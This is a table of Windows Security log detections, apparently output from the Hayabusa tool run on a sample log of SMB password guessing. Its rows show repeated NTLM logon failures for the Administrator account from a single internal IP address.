| 1216 | 2016-09-20 01:50:31.978 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1217 | 2016-09-20 01:50:32.009 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1218 | 2016-09-20 01:50:32.051 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1219 | 2016-09-20 01:50:32.096 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1220 | 2016-09-20 01:50:32.136 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1221 | 2016-09-20 01:50:32.185 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1222 | 2016-09-20 01:50:32.237 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1223 | 2016-09-20 01:50:32.280 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1224 | 2016-09-20 01:50:32.313 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1225 | 2016-09-20 01:50:32.349 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1226 | 2016-09-20 01:50:32.396 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1227 | 2016-09-20 01:50:32.450 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1228 | 2016-09-20 01:50:32.568 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1229 | 2016-09-20 01:50:32.610 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1230 | 2016-09-20 01:50:32.648 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1231 | 2016-09-20 01:50:32.691 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1232 | 2016-09-20 01:50:32.728 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1233 | 2016-09-20 01:50:32.769 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1234 | 2016-09-20 01:50:32.817 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1235 | 2016-09-20 01:50:32.849 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1236 | 2016-09-20 01:50:32.884 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1237 | 2016-09-20 01:50:32.928 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1238 | 2016-09-20 01:50:32.972 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1239 | 2016-09-20 01:50:33.004 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1240 | 2016-09-20 01:50:33.047 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1241 | 2016-09-20 01:50:33.081 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1242 | 2016-09-20 01:50:33.124 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1243 | 2016-09-20 01:50:33.164 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1244 | 2016-09-20 01:50:33.200 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1245 | 2016-09-20 01:50:33.240 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1246 | 2016-09-20 01:50:33.288 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1247 | 2016-09-20 01:50:33.328 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1248 | 2016-09-20 01:50:33.370 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1249 | 2016-09-20 01:50:33.417 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1250 | 2016-09-20 01:50:33.452 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1251 | 2016-09-20 01:50:33.492 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1252 | 2016-09-20 01:50:33.532 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1253 | 2016-09-20 01:50:33.582 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1254 | 2016-09-20 01:50:33.628 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1255 | 2016-09-20 01:50:33.666 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1256 | 2016-09-20 01:50:33.701 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1257 | 2016-09-20 01:50:33.736 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1258 | 2016-09-20 01:50:33.776 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1259 | 2016-09-20 01:50:33.811 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1260 | 2016-09-20 01:50:33.848 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1261 | 2016-09-20 01:50:33.894 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1262 | 2016-09-20 01:50:33.936 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1263 | 2016-09-20 01:50:33.972 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1264 | 2016-09-20 01:50:34.012 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1265 | 2016-09-20 01:50:34.056 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1266 | 2016-09-20 01:50:34.108 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1267 | 2016-09-20 01:50:34.148 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1268 | 2016-09-20 01:50:34.186 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1269 | 2016-09-20 01:50:34.228 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1270 | 2016-09-20 01:50:34.276 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1271 | 2016-09-20 01:50:34.329 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1272 | 2016-09-20 01:50:34.360 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1273 | 2016-09-20 01:50:34.400 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1274 | 2016-09-20 01:50:34.447 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1275 | 2016-09-20 01:50:34.476 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1276 | 2016-09-20 01:50:34.524 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1277 | 2016-09-20 01:50:34.573 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1278 | 2016-09-20 01:50:34.680 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1279 | 2016-09-20 01:50:34.708 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1280 | 2016-09-20 01:50:34.748 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1281 | 2016-09-20 01:50:34.790 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1282 | 2016-09-20 01:50:34.833 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1283 | 2016-09-20 01:50:34.868 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1284 | 2016-09-20 01:50:34.922 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1285 | 2016-09-20 01:50:34.965 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
